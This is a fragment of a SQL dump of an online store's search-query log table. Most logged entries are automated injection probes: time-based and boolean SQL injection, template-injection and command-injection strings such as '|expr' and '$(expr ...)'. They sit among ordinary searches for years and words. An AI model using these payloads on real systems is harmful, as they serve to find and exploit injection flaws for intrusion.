(2064, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' AND 2*3*8=6*8 AND \'v0HO\'=\'v0HO', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:39:50'),
(2066, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' AND 2*3*8=6*9 AND \'v0HO\'=\'v0HO', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:39:53'),
(2068, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' AND 3*3<(2*4) AND \'v0HO\'=\'v0HO', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:39:56'),
(2070, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\" AND 2*3*8=6*8 AND \"lbQO\"=\"lbQO', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:39:57'),
(2072, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX%\' AND 2*3*8=6*8 AND \'sbUi\'!=\'sbUi%', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:39:59'),
(2074, '-1 OR 2+606-606-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:00'),
(2076, '-1 OR 3+606-606-1=0+0+0+1', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:02'),
(2078, '-1 OR 3*2<(0+5+606-606)', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:04'),
(2080, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' RLIKE (SELECT (CASE WHEN (327=327) THEN 1 ELSE 0x28 END)) --', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:06'),
(2084, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\'|||\'', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:08'),
(2086, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\'||\'\'||\'', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:10'),
(2088, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\'||\'875\'||\'', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:13'),
(2100, 'wJn1OZNk\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:24'),
(2102, 'cBivXFvc\' OR 444=(SELECT 444 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:27'),
(2104, 'xGogbstT\') OR 555=(SELECT 555 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:29'),
(2106, 'SUDx9JoQ\')) OR 464=(SELECT 464 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:31'),
(2114, '@@Nn9hk', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:40:37'),
(2122, 'vYaMKKCU', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:47:18'),
(2124, '-1 OR 2+24-24-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:47:23'),
(2126, '-1 OR 2+135-135-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:47:29'),
(2128, '-1\' OR 2+271-271-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:47:37'),
(2130, '-1\' OR 2+707-707-1=0+0+0+1 or \'H89gG7Qb\'=\'', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:47:42'),
(2132, '-1\" OR 2+748-748-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:47:44'),
(2144, 'RLQik5tv\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:48:22'),
(2146, 'aEHAcmYU\' OR 854=(SELECT 854 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:48:29'),
(2148, '9deYtBlz\') OR 572=(SELECT 572 FROM PG_SLEEP(15))--', 5, 2, NULL, 1, 1, 1, 0, '2026-01-08 01:55:26'),
(2150, 'nEcmtNaq\')) OR 91=(SELECT 91 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:48:40'),
(2158, '@@m74FC', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:48:51'),
(2166, 'RdcWLtlL', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:52:32'),
(2168, '-1 OR 2+540-540-1=0+0+0+1 --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:52:34'),
(2170, '-1 OR 2+396-396-1=0+0+0+1', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:52:35'),
(2172, '-1\' OR 2+509-509-1=0+0+0+1 --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:52:37'),
(2174, '-1\' OR 2+131-131-1=0+0+0+1 or \'spyo9X8l\'=\'', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:52:38'),
(2176, '-1\" OR 2+736-736-1=0+0+0+1 --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:52:39'),
(2188, 'FxDG9wPj\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:52:53'),
(2190, 'GssNpF5o\' OR 93=(SELECT 93 FROM PG_SLEEP(15))--', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:52:54'),
(2192, 'KzgRVpxy\') OR 216=(SELECT 216 FROM PG_SLEEP(15))--', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:52:58'),
(2194, 'bmr2ApO6\')) OR 275=(SELECT 275 FROM PG_SLEEP(15))--', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:52:59'),
(2202, '@@vSQjw', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:53:05'),
(2210, 'u7p18dmE', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:08:21'),
(2212, '-1 OR 2+659-659-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:08:23'),
(2214, '-1 OR 2+112-112-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:08:24'),
(2216, '-1\' OR 2+736-736-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:08:26'),
(2218, '-1\' OR 2+318-318-1=0+0+0+1 or \'rza9ANtG\'=\'', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:08:27'),
(2220, '-1\" OR 2+41-41-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:08:28'),
(2232, 'Bss3YCH3\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:09:15'),
(2234, 'iIjIaVMb\' OR 413=(SELECT 413 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:09:22'),
(2236, '0rnI3vI2\') OR 806=(SELECT 806 FROM PG_SLEEP(15))--', 5, 2, NULL, 1, 1, 1, 0, '2025-04-30 06:21:14'),
(2238, 'mibIBYfR\')) OR 915=(SELECT 915 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:09:32'),
(2246, '@@cttNR', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:10:05'),
(2289, 'tEGnsdeY', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:11:44'),
(2293, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' AND 2*3*8=6*8 AND \'hxPR\'=\'hxPR', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:11:47'),
(2295, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\" AND 2*3*8=6*8 AND \"Cks8\"=\"Cks8', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:11:48'),
(2297, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX%\' AND 2*3*8=6*8 AND \'sYXb\'!=\'sYXb%', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:11:50'),
(2299, '-1 OR 2+878-878-1=0+0+0+1', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:11:51'),
(2303, '-1 OR 3+878-878-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:11:56'),
(2305, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' RLIKE (SELECT (CASE WHEN (370=370) THEN 1 ELSE 0x28 END)) --', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:11:57'),
(2327, '4ueTDz2h\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:12:23'),
(2329, 'm0xBdLRn\' OR 104=(SELECT 104 FROM PG_SLEEP(15))--', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:12:27'),
(2331, 'buVyYvGo\') OR 274=(SELECT 274 FROM PG_SLEEP(15))--', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:12:33'),
(2333, 'A4Ps9bQk\')) OR 50=(SELECT 50 FROM PG_SLEEP(15))--', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:12:34'),
(2340, '@@FZihR', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 13:12:45'),
(2351, '${@var_dump(md5(764629902))};', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:10'),
(2353, '${906391214+871974482}', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:10'),
(2371, '\'-var_dump(md5(787210738))-\'', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:16'),
(2383, '123456/**/and+0=0', 0, 2, NULL, 1, 1, 1, 0, '2023-10-19 04:14:23'),
(2386, '123456\'and/**/extractvalue(1,concat(char(126),md5(1500177945)))and\'', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:20'),
(2389, '123456\nexpr 862368814 + 933510535', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:20'),
(2392, '123456/**/and+3=8', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:21'),
(2395, '123456|expr 925868073 + 868689327', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:22'),
(2397, '123456\"and/**/extractvalue(1,concat(char(126),md5(1258543635)))and\"', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:22'),
(2399, '/*1*/{{836411225+841867991}}', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:22'),
(2401, '123456\'and\'o\'=\'o', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:23'),
(2404, '123456$(expr 930024750 + 970548881)', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:23'),
(2405, 'extractvalue(1,concat(char(126),md5(1167483839)))', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:23'),
(2408, '123456\'and\'v\'=\'m', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:24'),
(2409, '${900955406+969284580}', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:24'),
(2411, '123456&set /A 921316413+880392032', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:24'),
(2413, '123456\'and(select\'1\'from/**/cast(md5(1608460527)as/**/int))>\'0', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:25'),
(2416, '123456\"and\"u\"=\"u', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:25'),
(2417, '${(843903768+870001263)?c}', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:26'),
(2419, 'expr 922147776 + 830019560', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:26'),
(2421, '123456/**/and/**/cast(md5(\'1979348808\')as/**/int)>0', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:26'),
(2423, '123456\"and\"c\"=\"e', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:27'),
(2426, '#set($c=950223196+936041204)${c}$c', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:28'),
(2428, 'convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1298371044\')))', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:28'),
(2432, '<%- 840748404+987452452 %>', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:29'),
(2433, '123456\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1400397924\')))>\'0', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:30'),
(2446, '(select*from(select+sleep(6)union/**/select+1)a)', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:35'),
(2456, '123456\'and(select*from(select+sleep(6))a/**/union/**/select+1)=\'', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:40'),
(2464, '123456\"and(select*from(select+sleep(6))a/**/union/**/select+1)=\"', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:44'),
(2472, '123456/**/and(select+1/**/from/**/pg_sleep(6))>0/**/', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:49'),
(2478, '123456\'/**/and(select\'1\'from/**/pg_sleep(6))::text>\'0', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:54'),
(2484, '123456/**/and(select+1)>0waitfor/**/delay\'0:0:6\'/**/', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:27:58'),
(2488, '123456\'and(select+1)>0waitfor/**/delay\'0:0:6', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:28:05'),
(2490, '123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE(\'m\',0)', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:28:08'),
(2492, '123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE(\'h\',6)', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:28:13'),
(2494, '123456\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'v\',0)=\'v', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:28:19'),
(2496, '123456\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'y\',6)=\'y', 0, 1, NULL, 1, 1, 1, 0, '2023-08-15 09:28:25'),
(2546, '2023', 0, 251, NULL, 1, 1, 1, 0, '2026-03-11 16:28:38'),
(2548, '2024', 0, 698, NULL, 1, 1, 1, 0, '2025-10-09 11:53:39'),
(2770, '${808922626+970869639}', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:12'),
(2771, '${@var_dump(md5(655973291))};', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:13'),
(2775, '123456\nexpr 804730262 + 943617563', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:14'),
(2781, '/*1*/{{803756361+883855706}}', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:15'),
(2785, '123456|expr 916644772 + 961825002', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:16'),
(2790, '\'-var_dump(md5(770979767))-\'', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:18'),
(2791, '${904426296+870849079}', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:18'),
(2797, '123456$(expr 961684492 + 846355929)', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:19'),
(2800, '${(970243503+817813728)?c}', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:22'),
(2806, '123456&set /A 976841259+820505852', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:23'),
(2807, '123456\'and/**/extractvalue(1,concat(char(126),md5(1203153553)))and\'', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:23'),
(2810, '#set($c=807297155+884208276)${c}$c', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:26'),
(2814, 'expr 824482799 + 899306475', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:27'),
(2815, '123456\"and/**/extractvalue(1,concat(char(126),md5(1221994452)))and\"', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:27'),
(2818, '123456/**/and+1=8', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:28'),
(2820, '<%- 930739902+863723237 %>', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:31'),
(2822, 'extractvalue(1,concat(char(126),md5(1866406343)))', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:32'),
(2824, '123456\'and\'p\'=\'p', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:34'),
(2830, '123456\'and(select\'1\'from/**/cast(md5(1145511812)as/**/int))>\'0', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:37'),
(2832, '123456\'and\'f\'=\'c', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:39'),
(2838, '123456/**/and/**/cast(md5(\'1110635050\')as/**/int)>0', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:43'),
(2840, '123456\"and\"e\"=\"e', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:46'),
(2846, 'convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1379372372\')))', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:51'),
(2848, '123456\"and\"x\"=\"l', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:54'),
(2854, '123456\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1971031362\')))>\'0', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:14:58'),
(2916, '123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE(\'h\',0)', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:16:37'),
(2918, '123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE(\'s\',5)', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:16:44'),
(2920, '123456\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'i\',0)=\'i', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:16:52'),
(2922, '123456\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'r\',5)=\'r', 0, 1, NULL, 1, 1, 1, 0, '2023-10-19 04:16:57'),
(3042, '2011', 0, 7, NULL, 1, 1, 1, 0, '2024-11-18 21:14:23'),
(3065, '9', 0, 0, NULL, 1, 1, 1, 0, '2023-11-22 20:05:53'),
(3066, '4', 0, 0, NULL, 1, 1, 1, 0, '2023-11-22 20:12:14'),
(3068, '2013', 0, 2, NULL, 1, 1, 1, 0, '2023-11-22 22:27:40'),
(3070, '6', 0, 0, NULL, 1, 1, 1, 0, '2023-11-22 21:44:24'),
(3073, '5', 0, 0, NULL, 1, 1, 1, 0, '2023-11-22 22:33:39'),
(3074, '0', 0, 0, NULL, 1, 1, 1, 0, '2023-11-22 22:46:24');
INSERT INTO `search_query` (`query_id`, `query_text`, `num_results`, `popularity`, `redirect`, `store_id`, `display_in_terms`, `is_active`, `is_processed`, `updated_at`) VALUES
(3075, '2010', 0, 24, NULL, 1, 1, 1, 0, '2025-10-05 21:37:54'),
(3077, '2017', 0, 9, NULL, 1, 1, 1, 0, '2026-03-22 20:45:11'),
(3080, '2012', 0, 21, NULL, 1, 1, 1, 0, '2025-09-01 17:27:05'),
(3082, '2019', 0, 13, NULL, 1, 1, 1, 0, '2025-07-15 22:43:37'),
(3086, '7', 0, 0, NULL, 1, 1, 1, 0, '2023-11-22 23:51:08'),
(3089, '2014', 0, 14, NULL, 1, 1, 1, 0, '2024-12-02 01:19:50'),
(3091, '2015', 0, 24, NULL, 1, 1, 1, 0, '2025-09-02 14:39:05'),
(3093, '2016', 0, 22, NULL, 1, 1, 1, 0, '2025-10-15 07:21:02'),
(3099, '3', 0, 0, NULL, 1, 1, 1, 0, '2023-11-23 00:41:15'),
(3101, '2', 0, 0, NULL, 1, 1, 1, 0, '2023-11-23 01:20:29'),
(3109, '2018', 0, 4, NULL, 1, 1, 1, 0, '2024-10-31 12:33:42'),
(3119, '8', 0, 0, NULL, 1, 1, 1, 0, '2023-11-23 07:59:44'),
(3399, '2025', 0, 516, NULL, 1, 1, 1, 0, '2025-08-22 00:30:29'),
(3511, 'shop', 0, 25, NULL, 1, 1, 1, 0, '2026-02-18 05:31:38'),
(3963, '7701', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:36:56'),
(3965, '8028', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:36:59'),
(3967, 'Search entire store here...(\",),\")((\'', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:37:02'),
(3969, 'Search entire store here...\'MhXUyx<\'\">vdStYI', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:37:03'),
(3971, 'Search entire store here... AND 5138=6275', 4, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:37:17'),
(3973, 'Search entire store here...%\' AND 4315=8104 AND \'%\'=\'', 4, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:37:21'),
(3975, 'Search entire store here... AND 8392=7940-- fwJz', 4, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:37:25'),
(3977, '(SELECT (CASE WHEN (4303=1891) THEN 4303 ELSE 4303*(SELECT 4303 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))', 2, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:37:28'),
(4009, 'Search entire store here...);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(81)||CHR(113)||CHR(103),5) FROM DUAL--', 2, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:06'),
(4011, 'Search entire store here...;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(81)||CHR(113)||CHR(103),5) FROM DUAL--', 2, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:07'),
(4013, 'Search entire store here...\');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(81)||CHR(113)||CHR(103),5) FROM DUAL--', 2, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:09'),
(4015, 'Search entire store here...\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(81)||CHR(113)||CHR(103),5) FROM DUAL--', 2, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:11'),
(4017, 'Search entire store here...%\';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(81)||CHR(113)||CHR(103),5) FROM DUAL--', 2, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:14'),
(4023, 'Search entire store here... AND SLEEP(5)-- QHBU', 4, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:20'),
(4025, 'Search entire store here... AND 9197=(SELECT 9197 FROM PG_SLEEP(5))', 4, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:23'),
(4027, 'Search entire store here...%\' AND 9197=(SELECT 9197 FROM PG_SLEEP(5)) AND \'%\'=\'', 4, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:25'),
(4029, 'Search entire store here... AND 9197=(SELECT 9197 FROM PG_SLEEP(5))-- sZYS', 4, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:27'),
(4035, 'Search entire store here... WAITFOR DELAY \'0:0:5\'-- QSek', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:33'),
(4037, 'Search entire store here... AND 1964=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(117)||CHR(74)||CHR(117),5)', 4, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:35'),
(4039, 'Search entire store here...%\' AND 1964=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(117)||CHR(74)||CHR(117),5) AND \'%\'=\'', 4, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:37'),
(4041, 'Search entire store here... AND 1964=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(117)||CHR(74)||CHR(117),5)-- lmRk', 4, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:39'),
(4043, 'Search entire store here...) ORDER BY 1-- bvAN', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:41'),
(4045, 'Search entire store here...) ORDER BY 9367-- hhLq', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:43'),
(4047, 'Search entire store here... ORDER BY 1-- ipSQ', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:51'),
(4049, 'Search entire store here... ORDER BY 5204-- PCzy', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:38:54'),
(4051, 'Search entire store here...\') ORDER BY 1-- Voax', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:01'),
(4053, 'Search entire store here...\') ORDER BY 7047-- qEzh', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:03'),
(4055, 'Search entire store here...\' ORDER BY 1-- ZSCa', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:11'),
(4057, 'Search entire store here...\' ORDER BY 2970-- tztR', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:13'),
(4059, 'Search entire store here...%\' ORDER BY 1-- dfNT', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:21'),
(4061, 'Search entire store here...%\' ORDER BY 6090-- TXOX', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:24'),
(4063, 'Search entire store here... ORDER BY 1-- FrJl', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:31'),
(4065, 'Search entire store here... ORDER BY 7867-- xkmo', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:34'),
(4067, 'Search entire store here...) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:41'),
(4069, 'Search entire store here...) ORDER BY 8287#', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:44'),
(4071, 'Search entire store here... ORDER BY 1#', 0, 2, NULL, 1, 1, 1, 0, '2024-06-11 07:40:30'),
(4073, 'Search entire store here... ORDER BY 1461#', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:39:54'),
(4075, 'Search entire store here...\') ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:40:01'),
(4077, 'Search entire store here...\') ORDER BY 4928#', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:40:03'),
(4079, 'Search entire store here...\' ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:40:10'),
(4081, 'Search entire store here...\' ORDER BY 5981#', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:40:13'),
(4083, 'Search entire store here...%\' ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:40:20'),
(4085, 'Search entire store here...%\' ORDER BY 1587#', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:40:23'),
(4089, 'Search entire store here... ORDER BY 7951#', 0, 1, NULL, 1, 1, 1, 0, '2024-06-11 07:40:33'),
(4304, '%a%', 7, 1, NULL, 1, 1, 1, 0, '2024-07-30 16:51:35'),
(5364, 'test', 0, 169, NULL, 1, 1, 1, 0, '2026-01-02 07:01:19'),
(5382, 'vY3T1cRC', 0, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:22'),
(5384, '-1 OR 2+367-367-1=0+0+0+1 --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:28'),
(5388, '-1 OR 3+367-367-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:32'),
(5390, '-1 OR 3*2<(0+5+367-367) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:34'),
(5392, '-1 OR 2+541-541-1=0+0+0+1', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:35'),
(5394, '-1 OR 3+541-541-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:37'),
(5396, '-1 OR 3*2<(0+5+541-541)', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:38'),
(5398, '-1\' OR 2+428-428-1=0+0+0+1 --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:40'),
(5400, '-1\' OR 3+428-428-1=0+0+0+1 --', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:42'),
(5402, '-1\' OR 3*2<(0+5+428-428) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:43'),
(5404, '-1\' OR 3*2>(0+5+428-428) --', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:45'),
(5406, '-1\' OR 2+720-720-1=0+0+0+1 or \'1ssHdNF7\'=\'', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:47'),
(5408, '-1\' OR 3+720-720-1=0+0+0+1 or \'1ssHdNF7\'=\'', 3, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:48'),
(5410, '-1\' OR 3*2<(0+5+720-720) or \'1ssHdNF7\'=\'', 5, 1, NULL, 1, 1, 1, 0, '2025-03-08 11:08:50'),
